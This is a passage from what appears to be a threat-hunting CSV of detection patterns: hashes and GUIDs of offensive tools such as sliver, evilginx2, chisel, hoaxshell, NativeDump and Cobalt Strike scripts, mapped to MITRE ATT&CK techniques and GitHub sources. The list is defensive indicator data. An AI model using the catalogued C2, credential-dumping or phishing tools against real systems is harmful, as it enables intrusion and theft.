- T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5ccafa7f7b00774dd423a64460ef3d1c551ee95f076107cb8353f6271819f4d7*",".{0,1000}5ccafa7f7b00774dd423a64460ef3d1c551ee95f076107cb8353f6271819f4d7.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*5cd6f1ac11ce75c742358c9225983712e9ae31fd16e052b377a795d8ba4d18f6*",".{0,1000}5cd6f1ac11ce75c742358c9225983712e9ae31fd16e052b377a795d8ba4d18f6.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*5cdce3c908a8a7a336d21543c1133071b6395e26ca882cafc05fb6dbdce075f1*",".{0,1000}5cdce3c908a8a7a336d21543c1133071b6395e26ca882cafc05fb6dbdce075f1.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*5cdec4449506fe06e507619c8f1a66d890d96bb2ea30f6ea37f997853a52b243*",".{0,1000}5cdec4449506fe06e507619c8f1a66d890d96bb2ea30f6ea37f997853a52b243.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" 
"*5ce31dbbcce69be63eaddd6759ea115162e96500f9ee185b106eb47c5c1417ce*",".{0,1000}5ce31dbbcce69be63eaddd6759ea115162e96500f9ee185b106eb47c5c1417ce.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*5cfed16ae88f9a36880352f6490b9c417c8d46744a606e453eabf813f26f1239*",".{0,1000}5cfed16ae88f9a36880352f6490b9c417c8d46744a606e453eabf813f26f1239.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5D03EFC2-72E9-4410-B147-0A1A5C743999*",".{0,1000}5D03EFC2\-72E9\-4410\-B147\-0A1A5C743999.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*5D10ED0A-6C52-49FE-90F5-CFAAECA8FABE*",".{0,1000}5D10ED0A\-6C52\-49FE\-90F5\-CFAAECA8FABE.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open 
source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*5d16081315e1588a26019bb5195f2f72f278a3c86acf8cc1c072b791960beabf*",".{0,1000}5d16081315e1588a26019bb5195f2f72f278a3c86acf8cc1c072b791960beabf.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*5d3f3909639924fe921e0ff58be252bd671db7d2c2c0cf56d301f4ea48548306*",".{0,1000}5d3f3909639924fe921e0ff58be252bd671db7d2c2c0cf56d301f4ea48548306.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*5d43bbdef3c107cf95891b56c5b40febf853f0aca57991492a4025032a8fa050*",".{0,1000}5d43bbdef3c107cf95891b56c5b40febf853f0aca57991492a4025032a8fa050.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" 
"*5d447208b1a06d45b5563f56da869e3c6ffa8e67247809798d24065d719160e8*",".{0,1000}5d447208b1a06d45b5563f56da869e3c6ffa8e67247809798d24065d719160e8.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5d494fc79356aeb1e983aab7188e729550c1f54ffcdcb02270acc492f2164afa*",".{0,1000}5d494fc79356aeb1e983aab7188e729550c1f54ffcdcb02270acc492f2164afa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5d61397acd2c3b39da7f48673ce25690db669c68d538487cdf79ecc8b56f039d*",".{0,1000}5d61397acd2c3b39da7f48673ce25690db669c68d538487cdf79ecc8b56f039d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf*",".{0,1000}5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*5d848352fb3ae2109dd1ee927717c8c004f2e07f33b14d7fd25dba71784f5579*",".{0,1000}5d848352fb3ae2109dd1ee927717c8c004f2e07f33b14d7fd25dba71784f5579.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5da9049dbb09c0f24ee3732e407eb636230a1f8b8dea5f40e74651102229cd92*",".{0,1000}5da9049dbb09c0f24ee3732e407eb636230a1f8b8dea5f40e74651102229cd92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5dd1488efa5a855d71e3b60d9d398f1fcaae367c352e731ced194c0fa261ac95*",".{0,1000}5dd1488efa5a855d71e3b60d9d398f1fcaae367c352e731ced194c0fa261ac95.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - 
TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5dec1cfe7c0c2ec55c17fb44b43f7d14*",".{0,1000}5dec1cfe7c0c2ec55c17fb44b43f7d14.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*5ded3e0d1d7d2261be33496b0c7e59c8b6604d6cca0f371caa669d3f47eb10f0*",".{0,1000}5ded3e0d1d7d2261be33496b0c7e59c8b6604d6cca0f371caa669d3f47eb10f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*",".{0,1000}5E0812A9\-C727\-44F3\-A2E3\-8286CDC3ED4F.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" 
"*5e1896cd6c5bc82e6369f5e143bf87a59b37775c7987d36e29ff1846c4863d98*",".{0,1000}5e1896cd6c5bc82e6369f5e143bf87a59b37775c7987d36e29ff1846c4863d98.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5e25477af34314dc8fd4fe2013845ec55572ac213148b70499b928bc4af1f1c1*",".{0,1000}5e25477af34314dc8fd4fe2013845ec55572ac213148b70499b928bc4af1f1c1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5e3261026ae988a6e7d629e1201733ea922d06b37d4d07df2223a1427ea8c63c*",".{0,1000}5e3261026ae988a6e7d629e1201733ea922d06b37d4d07df2223a1427ea8c63c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*5e5a0618107570e45d2d2559d13658fb0e08f732*",".{0,1000}5e5a0618107570e45d2d2559d13658fb0e08f732.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*5e68b0a2d0424b4afb739ac7938e49ec2e9cb41999346aee22c0284aa1cdcf5c*",".{0,1000}5e68b0a2d0424b4afb739ac7938e49ec2e9cb41999346aee22c0284aa1cdcf5c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5e6cfa7f3d2e7bf2eadb2d4f197189d43798b3270c39bbe3a2fb99c5684ec686*",".{0,1000}5e6cfa7f3d2e7bf2eadb2d4f197189d43798b3270c39bbe3a2fb99c5684ec686.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*",".{0,1000}5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*5E9715AB-CAF7-4FFF-8E14-A8727891DA93*",".{0,1000}5E9715AB\-CAF7\-4FFF\-8E14\-A8727891DA93.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source 
obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*5e98194a01c6b48fa582a6a9fcbb92d6*",".{0,1000}5e98194a01c6b48fa582a6a9fcbb92d6.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*5e98194a01c6b48fa582a6a9fcbb92d6*",".{0,1000}5e98194a01c6b48fa582a6a9fcbb92d6.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*5ea7260956640dae112bc2bcc9bd1e0fbf43a6efccd0cc56d95cfecf8af241b1*",".{0,1000}5ea7260956640dae112bc2bcc9bd1e0fbf43a6efccd0cc56d95cfecf8af241b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5ebd789e726c94beb41e0934df6fb9bf62af28cc87093b9785dc9baa4ecde96b*",".{0,1000}5ebd789e726c94beb41e0934df6fb9bf62af28cc87093b9785dc9baa4ecde96b.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5f27ca4597ebd322f8fca8f3f74a1771d0e5a3f2f9d53779345f73f62c9f5440*",".{0,1000}5f27ca4597ebd322f8fca8f3f74a1771d0e5a3f2f9d53779345f73f62c9f5440.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5f2c1a61ebef09dd554f3e9db1ae4bd1a516e69b39375948614573aa8e853cac*",".{0,1000}5f2c1a61ebef09dd554f3e9db1ae4bd1a516e69b39375948614573aa8e853cac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*",".{0,1000}5F4DC47F\-7819\-4528\-9C16\-C88F1BE97EC5.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" 
"*5f7c2da21629fca7b712829f2d3579ef49af424cc00da2dfc1f4503afebf9eb0*",".{0,1000}5f7c2da21629fca7b712829f2d3579ef49af424cc00da2dfc1f4503afebf9eb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5f871566a9113e31357e084743f12b74b7199019e66cd10847b61b5666ecf9b1*",".{0,1000}5f871566a9113e31357e084743f12b74b7199019e66cd10847b61b5666ecf9b1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*5faa6197612a38b41bb54cbec6c782b5ea1bfb2da9ce236e493451de1b33ff47*",".{0,1000}5faa6197612a38b41bb54cbec6c782b5ea1bfb2da9ce236e493451de1b33ff47.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5FAC3991-D4FD-4227-B73D-BEE34EB89987*",".{0,1000}5FAC3991\-D4FD\-4227\-B73D\-BEE34EB89987.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 
- TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*5FAE766D503C33AD0AE90520BFA0ADA54FFC6FF998B0542D1CF63D94B4126E3F*",".{0,1000}5FAE766D503C33AD0AE90520BFA0ADA54FFC6FF998B0542D1CF63D94B4126E3F.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*5fb9f7c101e98f3fd5c011f47519f007fe5d19decf1ade2d36ed57f378b29042*",".{0,1000}5fb9f7c101e98f3fd5c011f47519f007fe5d19decf1ade2d36ed57f378b29042.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5fbee690299d3b057447b595c46845c34a1fe90a1e616fbb07bb5e0d019bc101*",".{0,1000}5fbee690299d3b057447b595c46845c34a1fe90a1e616fbb07bb5e0d019bc101.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5fd654e8009f29c4f0137c797678d68065bb7a987a70a4437c99623de13d43f7*",".{0,1000}5fd654e8009f29c4f0137c797678d68065bb7a987a70a4437c99623de13d43f7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary 
